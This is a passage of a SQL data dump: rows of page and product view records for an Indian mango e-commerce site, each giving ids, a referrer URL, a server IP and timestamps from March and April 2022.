08:33:41'),(503,9,0,0,85,1,'https://mangomitra.in/','3.110.242.160','','','','2022-03-15 08:37:45'),(504,0,0,1,1097,21,'https://mangomitra.in/','3.110.242.160','','','','2022-03-15 08:49:58'),(505,0,0,1,1194,25,'https://mangomitra.in/shop/','3.110.242.160','','','','2022-03-15 09:01:25'),(506,0,0,1,1263,21,'https://mangomitra.in/product/alphonso-mango-3kg/','3.110.242.160','','','','2022-03-15 09:01:52'),(507,9,0,0,85,1,'https://mangomitra.in/','3.110.242.160','','','','2022-03-15 09:03:39'),(508,9,0,0,85,1,'https://mangomitra.in/','3.110.242.160','','','','2022-03-15 09:51:50'),(509,0,0,1,1194,25,'https://mangomitra.in/product-tag/pre-order/','3.110.242.160','','','','2022-03-15 09:52:01'),(510,0,0,1,1264,21,'https://mangomitra.in/product/alphonso-mango-3kg/','3.110.242.160','','','','2022-03-15 09:52:20'),(511,0,0,1,1169,21,'https://mangomitra.in/product/raw-mango-5kg/','3.110.242.160','','','','2022-03-15 10:04:31'),(512,0,0,1,1163,21,'https://mangomitra.in/product/mango-thokku-500gm/','3.110.242.160','','','','2022-03-15 10:05:10'),(513,0,0,1,1159,21,'https://mangomitra.in/','3.110.242.160','','','','2022-03-15 10:07:11'),(514,1,0,0,0,21,'https://mangomitra.in/','3.110.242.160','','','','2022-03-16 04:25:09'),(515,0,0,1,1119,21,'https://mangomitra.in/','3.110.242.160','','','','2022-03-16 08:57:51'),(516,0,0,1,1263,21,'https://mangomitra.in/','3.110.242.160','','','','2022-03-16 10:31:55'),(517,0,0,1,1264,21,'https://mangomitra.in/','3.110.242.160','','','','2022-03-16 10:40:13'),(518,0,0,1,1287,21,'https://mangomitra.in/?add-to-cart=1287','3.110.242.160','','','','2022-03-16 10:41:11'),(519,0,0,1,1114,21,'https://mangomitra.in/','3.110.242.160','','','','2022-03-16 10:41:46'),(520,0,0,1,1116,21,'https://mangomitra.in/','3.110.242.160','','','','2022-03-16 10:41:55'),(521,0,0,1,1288,21,'https://mangomitra.in/','3.110.242.160','','','','2022-03-16 10:44:19'),(522,0,0,1,1287,21,'https://mangomitra.in/cart/','3.110.242.160','','','','2022-03-16 10:44:21'),(523,0,0,1,1287,21,'https://mangomitra.in/','3.110.242.160','','','','2022-03-16 11:03:19'),(524,0,0,1,1287,21,'https://mangomitra.in/','3.110.242.160','','','','2022-03-17 08:17:15'),(525,0,0,1,1288,21,'https://mangomitra.in/','3.110.242.160','','','','2022-03-17 08:17:34'),(526,9,0,0,130,1,'https://mangomitra.in/','3.110.242.160','','','','2022-03-17 08:42:16'),(527,0,0,1,1116,21,'https://mangomitra.in/','3.110.242.160','','','','2022-03-17 09:03:52'),(528,0,0,1,1114,21,'https://mangomitra.in/','3.110.242.160','','','','2022-03-17 09:04:15'),(529,0,0,1,1287,21,'https://mangomitra.in/product/ratnagiri-alphonso-1-dozen/','3.110.242.160','','','','2022-03-17 09:31:42'),(530,9,0,0,37,1,'https://mangomitra.in/checkout/','3.110.242.160','','','','2022-03-17 09:33:11'),(531,9,0,0,130,1,'https://mangomitra.in/checkout/','3.110.242.160','','','','2022-03-17 09:33:12'),(532,9,0,0,85,1,'https://mangomitra.in/bulk-booking/','3.110.242.160','','','','2022-03-17 10:05:57'),(533,0,0,1,1116,21,'https://mangomitra.in/','3.110.242.160','','','','2022-03-17 13:03:54'),(534,0,0,1,1288,21,'https://mangomitra.in/product/banginapalli-mango-5kg/','3.110.242.160','','','','2022-03-17 13:04:04'),(535,0,0,1,1287,21,'https://mangomitra.in/?add-to-cart=1287','3.110.242.160','','','','2022-03-17 15:04:11'),(536,1,0,0,0,21,'','3.110.242.160','','','','2022-03-17 22:22:15'),(537,1,0,0,0,21,'','3.110.242.160','','','','2022-03-17 22:22:48'),(538,0,1,0,0,25,'','3.110.242.160','','','','2022-03-17 22:24:42'),(539,1,0,0,0,21,'','3.110.242.160','','','','2022-03-17 22:24:59'),(540,0,1,0,0,21,'','3.110.242.160','','','','2022-03-17 22:26:55'),(541,9,0,0,15,1,'','3.110.242.160','','','','2022-03-17 22:27:12'),(542,0,0,1,1069,21,'','3.110.242.160','','','','2022-03-17 22:28:35'),(543,9,0,0,35,1,'','3.110.242.160','','','','2022-03-17 22:29:09'),(544,0,0,1,1088,21,'','3.110.242.160','','','','2022-03-17 22:29:25'),(545,0,0,1,1082,21,'','3.110.242.160','','','','2022-03-17 22:29:42'),(546,0,0,1,1097,21,'','3.110.242.160','','','','2022-03-17 22:30:32'),(547,0,0,1,1263,21,'','3.110.242.160','','','','2022-03-17 22:30:48'),(548,0,0,1,1089,21,'','3.110.242.160','','','','2022-03-17 22:31:05'),(549,0,0,1,1083,21,'','3.110.242.160','','','','2022-03-17 22:31:21'),(550,0,0,1,1170,21,'','3.110.242.160','','','','2022-03-17 22:31:38'),(551,0,0,1,1159,21,'','3.110.242.160','','','','2022-03-17 22:31:55'),(552,9,0,0,130,1,'','3.110.242.160','','','','2022-03-17 22:33:17'),(553,0,0,1,1145,21,'','3.110.242.160','','','','2022-03-17 22:33:34'),(554,0,0,1,1091,21,'','3.110.242.160','','','','2022-03-17 22:33:50'),(555,0,0,1,1125,21,'','3.110.242.160','','','','2022-03-17 22:34:07'),(556,0,0,1,1126,21,'','3.110.242.160','','','','2022-03-17 22:34:24'),(557,0,0,1,1092,21,'','3.110.242.160','','','','2022-03-17 22:34:56'),(558,0,0,1,1129,21,'','3.110.242.160','','','','2022-03-17 22:35:13'),(559,0,0,1,1128,21,'','3.110.242.160','','','','2022-03-17 22:35:29'),(560,0,0,1,1169,21,'','3.110.242.160','','','','2022-03-17 22:35:46'),(561,0,0,1,1146,21,'','3.110.242.160','','','','2022-03-17 22:36:52'),(562,0,0,1,1132,21,'','3.110.242.160','','','','2022-03-17 22:37:08'),(563,0,0,1,1131,21,'','3.110.242.160','','','','2022-03-17 22:37:25'),(564,0,0,1,1093,21,'','3.110.242.160','','','','2022-03-17 22:37:41'),(565,0,0,1,1119,21,'','3.110.242.160','','','','2022-03-17 22:37:58'),(566,0,0,1,1100,21,'','3.110.242.160','','','','2022-03-17 22:38:14'),(567,0,0,1,1095,21,'','3.110.242.160','','','','2022-03-17 22:38:31'),(568,0,0,1,1140,21,'','3.110.242.160','','','','2022-03-17 22:38:48'),(569,0,0,1,1141,21,'','3.110.242.160','','','','2022-03-17 22:39:04'),(570,0,0,1,1264,21,'','3.110.242.160','','','','2022-03-17 22:39:21'),(571,0,0,1,1167,21,'','3.110.242.160','','','','2022-03-17 22:39:38'),(572,0,0,1,1122,21,'','3.110.242.160','','','','2022-03-17 22:39:54'),(573,0,0,1,1123,21,'','3.110.242.160','','','','2022-03-17 22:40:11'),(574,0,0,1,1135,21,'','3.110.242.160','','','','2022-03-17 22:40:27'),(575,0,0,1,1134,21,'','3.110.242.160','','','','2022-03-17 22:40:44'),(576,0,0,1,1120,21,'','3.110.242.160','','','','2022-03-17 22:41:00'),(577,0,0,1,1138,21,'','3.110.242.160','','','','2022-03-17 22:41:17'),(578,0,0,1,1137,21,'','3.110.242.160','','','','2022-03-17 22:41:34'),(579,0,0,1,1144,21,'','3.110.242.160','','','','2022-03-17 22:41:51'),(580,0,0,1,1143,21,'','3.110.242.160','','','','2022-03-17 22:42:07'),(581,0,0,1,1161,21,'','3.110.242.160','','','','2022-03-17 22:42:24'),(582,0,0,1,1086,21,'','3.110.242.160','','','','2022-03-17 22:42:40'),(583,0,0,1,1087,21,'','3.110.242.160','','','','2022-03-17 22:42:57'),(584,0,0,1,1084,21,'','3.110.242.160','','','','2022-03-17 22:43:14'),(585,0,0,1,1085,21,'','3.110.242.160','','','','2022-03-17 22:43:30'),(586,0,0,1,1114,21,'','3.110.242.160','','','','2022-03-17 22:43:47'),(587,0,0,1,1116,21,'','3.110.242.160','','','','2022-03-17 22:44:03'),(588,0,0,1,1111,21,'','3.110.242.160','','','','2022-03-17 22:44:20'),(589,0,0,1,1163,21,'','3.110.242.160','','','','2022-03-17 22:44:38'),(590,0,0,1,1102,21,'','3.110.242.160','','','','2022-03-17 22:44:54'),(591,0,0,1,1109,21,'','3.110.242.160','','','','2022-03-17 22:45:11'),(592,0,0,1,1117,21,'','3.110.242.160','','','','2022-03-17 22:45:28'),(593,0,0,1,1107,21,'','3.110.242.160','','','','2022-03-17 22:45:44'),(594,0,0,1,1165,21,'','3.110.242.160','','','','2022-03-17 22:46:01'),(595,9,0,0,36,1,'https://mangomitra.in/','3.110.242.160','','','','2022-03-18 15:47:18'),(596,9,0,0,37,1,'https://mangomitra.in/my-account/','3.110.242.160','','','','2022-03-18 15:53:34'),(597,0,0,1,1091,21,'https://mangomitra.in/product-category/pickle-mangoes/','3.110.242.160','','','','2022-03-18 15:53:47'),(598,9,0,0,130,1,'https://mangomitra.in/product/maagaya-pickle/','3.110.242.160','','','','2022-03-18 15:54:00'),(599,9,0,0,85,1,'https://mangomitra.in/mango-recipes/','3.110.242.160','','','','2022-03-18 15:57:43'),(600,1,0,0,0,21,'https://mangomitra.in/vendor-register/','3.110.242.160','','','','2022-03-18 15:59:53'),(601,9,0,0,130,1,'https://mangomitra.in/shop/','3.110.242.160','','','','2022-03-18 16:00:21'),(602,0,0,1,1263,21,'https://mangomitra.in/','3.110.242.160','','','','2022-03-18 16:01:12'),(603,1,0,0,0,21,'','3.110.242.160','','','','2022-03-19 01:58:41'),(604,9,0,0,130,1,'','3.110.242.160','','','','2022-03-19 02:06:29'),(605,9,0,0,35,1,'','3.110.242.160','','','','2022-03-19 02:08:52'),(606,9,0,0,36,1,'','3.110.242.160','','','','2022-03-19 02:11:09'),(607,9,0,0,37,1,'','3.110.242.160','','','','2022-03-19 02:13:17'),(608,9,0,0,38,1,'','3.110.242.160','','','','2022-03-19 02:19:35'),(609,9,0,0,77,1,'','3.110.242.160','','','','2022-03-19 02:22:09'),(610,0,0,1,1287,21,'','3.110.242.160','','','','2022-03-19 02:28:39'),(611,0,0,1,1288,21,'','3.110.242.160','','','','2022-03-19 02:30:55'),(612,0,0,1,1289,21,'','3.110.242.160','','','','2022-03-19 02:32:54'),(613,0,0,1,1263,21,'','3.110.242.160','','','','2022-03-19 02:35:00'),(614,0,0,1,1114,21,'','3.110.242.160','','','','2022-03-19 02:37:59'),(615,0,0,1,1116,21,'','3.110.242.160','','','','2022-03-19 02:40:12'),(616,0,0,1,1097,21,'','3.110.242.160','','','','2022-03-19 02:44:42'),(617,0,0,1,1264,21,'','3.110.242.160','','','','2022-03-19 02:46:48'),(618,0,0,1,1159,21,'','3.110.242.160','','','','2022-03-19 02:49:53'),(619,0,0,1,1161,21,'','3.110.242.160','','','','2022-03-19 02:52:02'),(620,0,0,1,1163,21,'','3.110.242.160','','','','2022-03-19 02:54:13'),(621,0,0,1,1165,21,'','3.110.242.160','','','','2022-03-19 02:56:55'),(622,0,0,1,1167,21,'','3.110.242.160','','','','2022-03-19 02:58:46'),(623,0,0,1,1169,21,'','3.110.242.160','','','','2022-03-19 03:00:45'),(624,0,0,1,1170,21,'','3.110.242.160','','','','2022-03-19 03:04:50'),(625,0,0,1,1109,21,'','3.110.242.160','','','','2022-03-19 03:07:32'),(626,0,0,1,1111,21,'','3.110.242.160','','','','2022-03-19 03:10:03'),(627,0,0,1,1117,21,'','3.110.242.160','','','','2022-03-19 03:12:18'),(628,0,0,1,1119,21,'','3.110.242.160','','','','2022-03-19 03:14:47'),(629,0,0,1,1120,21,'','3.110.242.160','','','','2022-03-19 03:16:53'),(630,0,0,1,1122,21,'','3.110.242.160','','','','2022-03-19 03:19:53'),(631,0,0,1,1123,21,'','3.110.242.160','','','','2022-03-19 03:22:05'),(632,0,0,1,1125,21,'','3.110.242.160','','','','2022-03-19 03:24:01'),(633,0,0,1,1126,21,'','3.110.242.160','','','','2022-03-19 03:26:28'),(634,0,0,1,1128,21,'','3.110.242.160','','','','2022-03-19 03:28:31'),(635,0,0,1,1129,21,'','3.110.242.160','','','','2022-03-19 03:30:18'),(636,0,0,1,1131,21,'','3.110.242.160','','','','2022-03-19 03:32:57'),(637,0,0,1,1132,21,'','3.110.242.160','','','','2022-03-19 03:34:39'),(638,0,0,1,1134,21,'','3.110.242.160','','','','2022-03-19 03:37:48'),(639,0,0,1,1135,21,'','3.110.242.160','','','','2022-03-19 03:39:50'),(640,0,0,1,1137,21,'','3.110.242.160','','','','2022-03-19 03:41:56'),(641,0,0,1,1138,21,'','3.110.242.160','','','','2022-03-19 03:43:53'),(642,9,0,0,85,1,'','3.110.242.160','','','','2022-03-19 03:50:25'),(643,0,0,1,1092,21,'','3.110.242.160','','','','2022-03-19 03:54:45'),(644,0,0,1,1107,21,'','3.110.242.160','','','','2022-03-19 03:56:36'),(645,9,0,0,127,1,'','3.110.242.160','','','','2022-03-19 03:59:30'),(646,9,0,0,128,1,'','3.110.242.160','','','','2022-03-19 04:01:54'),(647,9,0,0,129,1,'','3.110.242.160','','','','2022-03-19 04:03:36'),(648,0,0,1,1069,21,'','3.110.242.160','','','','2022-03-19 10:06:18'),(649,0,1,0,0,21,'','3.110.242.160','','','','2022-03-19 10:08:52'),(650,0,0,1,1082,21,'','3.110.242.160','','','','2022-03-19 10:10:45'),(651,0,0,1,1146,21,'','3.110.242.160','','','','2022-03-19 10:12:38'),(652,0,0,1,1145,21,'','3.110.242.160','','','','2022-03-19 10:15:12'),(653,0,0,1,1083,21,'','3.110.242.160','','','','2022-03-19 10:17:32'),(654,0,0,1,1084,21,'','3.110.242.160','','','','2022-03-19 10:19:20'),(655,0,0,1,1085,21,'','3.110.242.160','','','','2022-03-19 10:21:02'),(656,1,0,0,0,21,'','3.110.242.160','','','','2022-03-19 10:22:30'),(657,1,0,0,0,21,'','3.110.242.160','','','','2022-03-19 10:24:16'),(658,1,0,0,0,21,'','3.110.242.160','','','','2022-03-19 10:25:39'),(659,0,0,1,1143,21,'','3.110.242.160','','','','2022-03-19 10:31:42'),(660,0,0,1,1144,21,'','3.110.242.160','','','','2022-03-19 10:33:54'),(661,0,0,1,1088,21,'','3.110.242.160','','','','2022-03-19 10:35:51'),(662,0,0,1,1089,21,'','3.110.242.160','','','','2022-03-19 10:37:42'),(663,9,0,0,35,1,'','3.110.242.160','','','','2022-03-19 10:40:04'),(664,9,0,0,35,1,'','3.110.242.160','','','','2022-03-19 10:41:42'),(665,0,0,1,1095,21,'','3.110.242.160','','','','2022-03-19 10:44:26'),(666,0,0,1,1093,21,'','3.110.242.160','','','','2022-03-19 10:46:38'),(667,0,0,1,1100,21,'','3.110.242.160','','','','2022-03-19 10:48:04'),(668,0,0,1,1114,21,'https://www.google.com','3.110.242.160','','','','2022-03-19 17:51:26'),(669,0,0,1,1116,21,'https://www.google.com','3.110.242.160','','','','2022-03-19 17:51:28'),(670,0,0,1,1097,21,'https://www.google.com','3.110.242.160','','','','2022-03-19 17:51:30'),(671,0,0,1,1263,21,'https://www.google.com','3.110.242.160','','','','2022-03-19 17:51:31'),(672,0,0,1,1287,21,'https://www.google.com','3.110.242.160','','','','2022-03-19 17:51:33'),(673,0,0,1,1288,21,'https://www.google.com','3.110.242.160','','','','2022-03-19 17:51:37'),(674,9,0,0,130,1,'https://mangomitra.in/about-us/','3.110.242.160','','','','2022-03-20 03:31:55'),(675,9,0,0,130,1,'https://mangomitra.in/about-us/','3.110.242.160','','','','2022-03-20 17:00:10'),(676,9,0,0,37,1,'https://mangomitra.in/','3.110.242.160','','','','2022-03-21 06:28:28'),(677,9,0,0,36,1,'https://mangomitra.in/product-category/pickle-mangoes/','3.110.242.160','','','','2022-03-21 06:28:45'),(678,0,1,0,0,21,'https://mangomitra.in/product-category/pickles/','3.110.242.160','','','','2022-03-21 06:29:05'),(679,0,0,1,1095,21,'https://mangomitra.in/product-category/pickles/','3.110.242.160','','','','2022-03-21 06:36:31'),(680,0,0,1,1069,21,'https://mangomitra.in/product-category/pickles/','3.110.242.160','','','','2022-03-21 06:37:45'),(681,9,0,0,35,1,'https://mangomitra.in/','3.110.242.160','','','','2022-03-22 07:29:02'),(682,9,0,0,36,1,'https://mangomitra.in/product-category/mangoes/','3.110.242.160','','','','2022-03-22 07:29:32'),(683,9,0,0,37,1,'https://mangomitra.in/product-category/pickles/','3.110.242.160','','','','2022-03-22 07:30:18'),(684,9,0,0,38,1,'https://mangomitra.in/product-category/pickle-mangoes/','3.110.242.160','','','','2022-03-22 07:30:45'),(685,9,0,0,77,1,'https://mangomitra.in/product-category/jams-and-squashes/','3.110.242.160','','','','2022-03-22 07:30:57'),(686,9,0,0,130,1,'https://mangomitra.in/product-category/mango-juices/','3.110.242.160','','','','2022-03-22 07:31:29'),(687,9,0,0,127,1,'https://mangomitra.in/','3.110.242.160','','','','2022-03-22 07:34:36'),(688,1,0,0,0,21,'https://mangomitra.in/my-account/downloads/','3.110.242.160','','','','2022-03-22 07:44:44'),(689,0,0,1,1288,21,'https://mangomitra.in/?add-to-cart=1289','3.110.242.160','','','','2022-03-22 09:35:37'),(690,0,0,1,1114,21,'https://mangomitra.in/product/ratnagiri-alphonso-3-dozen/','3.110.242.160','','','','2022-03-22 09:37:26'),(691,1,0,0,0,21,'https://mangomitra.in/calender/','3.110.242.160','','','','2022-03-22 11:02:41'),(692,9,0,0,37,1,'https://mangomitra.in/','3.110.242.160','','','','2022-03-23 10:19:25'),(693,9,0,0,77,1,'https://mangomitra.in/product-category/pickle-mangoes/','3.110.242.160','','','','2022-03-23 10:21:02'),(694,0,0,1,1109,21,'https://mangomitra.in/','3.110.242.160','','','','2022-03-23 10:24:21'),(695,9,0,0,130,1,'https://mangomitra.in/product/frooti-mango-drink-plastic-bottle-2l/','3.110.242.160','','','','2022-03-23 10:25:15'),(696,9,0,0,38,1,'https://mangomitra.in/product-category/deal-of-the-day/','3.110.242.160','','','','2022-03-23 10:26:27'),(697,1,0,0,0,21,'','3.110.242.160','','','','2022-03-24 09:49:13'),(698,0,0,1,1144,21,'','3.110.242.160','','','','2022-03-25 05:08:33'),(699,0,0,1,1087,21,'','3.110.242.160','','','','2022-03-25 05:09:05'),(700,0,0,1,1165,21,'','3.110.242.160','','','','2022-03-25 05:09:29'),(701,1,0,0,0,21,'','3.110.242.160','','','','2022-03-25 05:10:00'),(702,0,0,1,1109,21,'','3.110.242.160','','','','2022-03-25 05:10:17'),(703,0,0,1,1102,21,'','3.110.242.160','','','','2022-03-25 05:10:34'),(704,0,0,1,1119,21,'','3.110.242.160','','','','2022-03-25 05:11:07'),(705,1,0,0,0,21,'','3.110.242.160','','','','2022-03-25 05:11:38'),(706,9,0,0,129,1,'','3.110.242.160','','','','2022-03-25 05:11:53'),(707,0,0,1,1129,21,'','3.110.242.160','','','','2022-03-25 05:12:10'),(708,1,0,0,0,21,'','3.110.242.160','','','','2022-03-25 05:12:25'),(709,9,0,0,128,1,'','3.110.242.160','','','','2022-03-25 05:12:42'),(710,9,0,0,35,1,'','3.110.242.160','','','','2022-03-25 05:12:57'),(711,0,0,1,1137,21,'','3.110.242.160','','','','2022-03-25 05:13:14'),(712,0,0,1,1084,21,'','3.110.242.160','','','','2022-03-25 05:13:30'),(713,0,0,1,1167,21,'','3.110.242.160','','','','2022-03-25 05:13:45'),(714,0,0,1,1145,21,'','3.110.242.160','','','','2022-03-25 05:14:02'),(715,0,0,1,1069,21,'','3.110.242.160','','','','2022-03-25 05:14:20'),(716,0,0,1,1134,21,'','3.110.242.160','','','','2022-03-25 05:14:36'),(717,9,0,0,37,1,'','3.110.242.160','','','','2022-03-25 05:14:52'),(718,0,0,1,1288,21,'','3.110.242.160','','','','2022-03-25 05:15:08'),(719,0,0,1,1125,21,'','3.110.242.160','','','','2022-03-25 05:15:25'),(720,0,0,1,1131,21,'','3.110.242.160','','','','2022-03-25 05:15:41'),(721,0,0,1,1161,21,'','3.110.242.160','','','','2022-03-25 05:15:57'),(722,1,0,0,0,21,'','3.110.242.160','','','','2022-03-25 05:16:13'),(723,0,0,1,1120,21,'','3.110.242.160','','','','2022-03-25 05:16:29'),(724,0,0,1,1135,21,'','3.110.242.160','','','','2022-03-25 05:17:00'),(725,9,0,0,77,1,'','3.110.242.160','','','','2022-03-25 05:18:04'),(726,1,0,0,0,21,'','3.110.242.160','','','','2022-03-25 05:18:19'),(727,0,0,1,1097,21,'','3.110.242.160','','','','2022-03-25 05:18:35'),(728,9,0,0,85,1,'','3.110.242.160','','','','2022-03-25 05:18:52'),(729,0,0,1,1123,21,'','3.110.242.160','','','','2022-03-25 05:19:24'),(730,0,1,0,0,21,'','3.110.242.160','','','','2022-03-25 05:19:42'),(731,0,1,0,0,21,'','3.110.242.160','','','','2022-03-25 05:20:00'),(732,0,0,1,1141,21,'','3.110.242.160','','','','2022-03-25 05:20:16'),(733,0,0,1,1088,21,'','3.110.242.160','','','','2022-03-25 05:21:08'),(734,9,0,0,35,1,'','3.110.242.160','','','','2022-03-25 05:21:25'),(735,0,0,1,1287,21,'','3.110.242.160','','','','2022-03-25 05:21:43'),(736,0,1,0,0,21,'','3.110.242.160','','','','2022-03-25 05:21:57'),(737,9,0,0,127,1,'','3.110.242.160','','','','2022-03-25 05:22:29'),(738,0,0,1,1122,21,'','3.110.242.160','','','','2022-03-25 05:22:44'),(739,0,1,0,0,21,'','3.110.242.160','','','','2022-03-25 05:23:01'),(740,0,0,1,1126,21,'','3.110.242.160','','','','2022-03-25 05:23:16'),(741,0,0,1,1169,21,'','3.110.242.160','','','','2022-03-25 05:23:31'),(742,0,1,0,0,21,'','3.110.242.160','','','','2022-03-25 05:23:56'),(743,0,0,1,1086,21,'','3.110.242.160','','','','2022-03-25 05:24:27'),(744,0,0,1,1146,21,'','3.110.242.160','','','','2022-03-25 05:24:47'),(745,0,0,1,1159,21,'','3.110.242.160','','','','2022-03-25 05:25:03'),(746,0,1,0,0,21,'','3.110.242.160','','','','2022-03-25 05:25:18'),(747,0,0,1,1093,21,'','3.110.242.160','','','','2022-03-25 05:25:34'),(748,9,0,0,38,1,'','3.110.242.160','','','','2022-03-25 05:25:50'),(749,0,0,1,1100,21,'','3.110.242.160','','','','2022-03-25 05:26:06'),(750,9,0,0,36,1,'','3.110.242.160','','','','2022-03-25 05:26:23'),(751,0,1,0,0,21,'','3.110.242.160','','','','2022-03-25 05:26:38'),(752,0,0,1,1097,21,'','3.110.242.160','','','','2022-03-25 05:26:55'),(753,0,0,1,1091,21,'','3.110.242.160','','','','2022-03-25 05:27:11'),(754,0,1,0,0,21,'','3.110.242.160','','','','2022-03-25 05:27:27'),(755,0,1,0,0,21,'','3.110.242.160','','','','2022-03-25 05:27:49'),(756,0,0,1,1116,21,'','3.110.242.160','','','','2022-03-25 05:28:04'),(757,0,0,1,1132,21,'','3.110.242.160','','','','2022-03-25 05:28:21'),(758,1,0,0,0,21,'','3.110.242.160','','','','2022-03-25 05:28:56'),(759,0,0,1,1163,21,'','3.110.242.160','','','','2022-03-25 05:29:28'),(760,0,1,0,0,21,'','3.110.242.160','','','','2022-03-25 05:29:44'),(761,9,0,0,130,1,'','3.110.242.160','','','','2022-03-25 05:29:59'),(762,0,0,1,1264,21,'','3.110.242.160','','','','2022-03-25 05:30:16'),(763,9,0,0,35,1,'','3.110.242.160','','','','2022-03-25 05:30:33'),(764,0,1,0,0,21,'','3.110.242.160','','','','2022-03-25 05:30:50'),(765,0,1,0,0,21,'','3.110.242.160','','','','2022-03-25 05:32:04'),(766,0,0,1,1263,21,'','3.110.242.160','','','','2022-03-25 05:32:35'),(767,0,0,1,1114,21,'','3.110.242.160','','','','2022-03-25 05:32:53'),(768,0,0,1,1128,21,'','3.110.242.160','','','','2022-03-25 05:33:23'),(769,0,0,1,1089,21,'','3.110.242.160','','','','2022-03-25 05:33:39'),(770,0,1,0,0,21,'','3.110.242.160','','','','2022-03-25 05:33:55'),(771,0,0,1,1083,21,'','3.110.242.160','','','','2022-03-25 05:34:10'),(772,0,0,1,1289,21,'','3.110.242.160','','','','2022-03-25 05:34:27'),(773,0,1,0,0,21,'','3.110.242.160','','','','2022-03-25 05:34:44'),(774,0,1,0,0,21,'','3.110.242.160','','','','2022-03-25 05:35:15'),(775,0,0,1,1111,21,'','3.110.242.160','','','','2022-03-25 05:35:33'),(776,9,0,0,130,1,'','3.110.242.160','','','','2022-03-25 05:35:50'),(777,0,1,0,0,21,'','3.110.242.160','','','','2022-03-25 05:36:07'),(778,0,1,0,0,21,'','3.110.242.160','','','','2022-03-25 05:36:22'),(779,0,1,0,0,21,'','3.110.242.160','','','','2022-03-25 05:36:38'),(780,1,0,0,0,21,'','3.110.242.160','','','','2022-03-25 05:36:54'),(781,0,0,1,1138,21,'','3.110.242.160','','','','2022-03-25 05:37:21'),(782,9,0,0,130,1,'','3.110.242.160','','','','2022-03-25 05:37:36'),(783,0,1,0,0,21,'','3.110.242.160','','','','2022-03-25 05:37:55'),(784,0,0,1,1170,21,'','3.110.242.160','','','','2022-03-25 05:38:10'),(785,0,1,0,0,21,'','3.110.242.160','','','','2022-03-25 05:38:24'),(786,0,0,1,1097,21,'','3.110.242.160','','','','2022-03-25 05:38:41'),(787,0,0,1,1085,21,'','3.110.242.160','','','','2022-03-25 05:39:11'),(788,0,1,0,0,21,'','3.110.242.160','','','','2022-03-25 05:39:43'),(789,9,0,0,130,1,'','3.110.242.160','','','','2022-03-25 05:39:59'),(790,0,0,1,1107,21,'','3.110.242.160','','','','2022-03-25 05:40:31'),(791,0,0,1,1092,21,'','3.110.242.160','','','','2022-03-25 05:40:46'),(792,0,1,0,0,21,'','3.110.242.160','','','','2022-03-25 05:41:17'),(793,0,0,1,1117,21,'','3.110.242.160','','','','2022-03-25 05:41:50'),(794,9,0,0,35,1,'','3.110.242.160','','','','2022-03-25 05:42:40'),(795,0,0,1,1082,21,'','3.110.242.160','','','','2022-03-25 05:43:26'),(796,9,0,0,35,1,'','3.110.242.160','','','','2022-03-25 05:43:56'),(797,9,0,0,35,1,'','3.110.242.160','','','','2022-03-25 05:44:13'),(798,0,0,1,1140,21,'','3.110.242.160','','','','2022-03-25 05:44:28'),(799,0,1,0,0,21,'','3.110.242.160','','','','2022-03-25 05:44:46'),(800,0,1,0,0,21,'','3.110.242.160','','','','2022-03-25 05:45:15'),(801,0,1,0,0,21,'','3.110.242.160','','','','2022-03-25 05:45:46'),(802,0,0,1,1095,21,'','3.110.242.160','','','','2022-03-25 05:46:49'),(803,0,0,1,1143,21,'','3.110.242.160','','','','2022-03-25 05:47:23'),(804,1,0,0,0,21,'https://mangomitra.in/','3.110.242.160','','','','2022-03-25 11:43:17'),(805,0,0,1,1287,21,'https://mangomitra.in/','3.110.242.160','','','','2022-03-25 20:17:09'),(806,0,0,1,1264,21,'https://mangomitra.in/product/ratnagiri-alphonso-1-dozen/','3.110.242.160','','','','2022-03-25 20:18:40'),(807,0,0,1,1263,21,'https://mangomitra.in/product/badami-mango-3kg/','3.110.242.160','','','','2022-03-25 20:20:45'),(808,9,0,0,35,1,'https://mangomitra.in/','3.110.242.160','','','','2022-03-28 09:29:09'),(809,0,0,1,1137,21,'https://mangomitra.in/product-category/mangoes/page/2/','3.110.242.160','','','','2022-03-28 09:39:03'),(810,0,0,1,1287,21,'','3.110.242.160','','','','2022-03-29 01:06:00'),(811,0,0,1,1289,21,'','3.110.242.160','','','','2022-03-29 01:06:14'),(812,9,0,0,130,1,'','3.110.242.160','','','','2022-03-29 01:06:18'),(813,0,0,1,1169,21,'https://mangomitra.in/','3.110.242.160','','','','2022-03-29 09:03:45'),(814,0,0,1,1287,21,'https://mangomitra.in/product/mango-thokku-500gm/','3.110.242.160','','','','2022-03-29 09:05:11'),(815,0,0,1,1263,21,'https://mangomitra.in/my-account/','3.110.242.160','','','','2022-03-29 09:06:07'),(816,9,0,0,37,1,'https://mangomitra.in/','3.110.242.160','','','','2022-03-30 11:49:07'),(817,9,0,0,85,1,'https://mangomitra.in/','3.110.242.160','','','','2022-03-31 05:25:26'),(818,9,0,0,85,1,'https://mangomitra.in/calender/','3.110.242.160','','','','2022-03-31 10:31:38'),(819,9,0,0,130,1,'','3.110.242.160','','','','2022-03-31 11:57:59'),(820,0,0,1,1120,21,'','3.110.242.160','','','','2022-03-31 11:58:02'),(821,0,0,1,1159,21,'','3.110.242.160','','','','2022-03-31 11:58:05'),(822,0,0,1,1135,21,'','3.110.242.160','','','','2022-03-31 11:58:07'),(823,0,0,1,1165,21,'','3.110.242.160','','','','2022-03-31 11:58:17'),(824,0,0,1,1093,21,'','3.110.242.160','','','','2022-03-31 11:58:19'),(825,0,0,1,1163,21,'','3.110.242.160','','','','2022-03-31 11:58:21'),(826,0,0,1,1069,21,'','3.110.242.160','','','','2022-03-31 11:58:24'),(827,9,0,0,35,1,'https://mangomitra.in/','3.110.242.160','','','','2022-04-01 04:38:14'),(828,9,0,0,130,1,'https://mangomitra.in/','3.110.242.160','','','','2022-04-02 08:15:22'),(829,9,0,0,77,1,'https://mangomitra.in/product-category/deal-of-the-day/','3.110.242.160','','','','2022-04-02 08:16:31'),(830,0,1,0,0,21,'https://mangomitra.in/product-category/mango-juices/','3.110.242.160','','','','2022-04-02 08:16:44'),(831,9,0,0,35,1,'https://mangomitra.in/product-category/mango-juices/','3.110.242.160','','','','2022-04-02 08:16:49'),(832,9,0,0,36,1,'https://mangomitra.in/about-us/','3.110.242.160','','','','2022-04-02 12:10:46'),(833,9,0,0,77,1,'https://mangomitra.in/product-category/pickles/','3.110.242.160','','','','2022-04-02 12:10:52'),(834,0,0,1,1287,21,'https://mangomitra.in/product-category/mango-juices/','3.110.242.160','','','','2022-04-02 12:11:00'),(835,9,0,0,130,1,'https://mangomitra.in/product-category/mango-juices/','3.110.242.160','','','','2022-04-02 12:12:42'),(836,9,0,0,35,1,'https://mangomitra.in/product-category/deal-of-the-day/','3.110.242.160','','','','2022-04-02 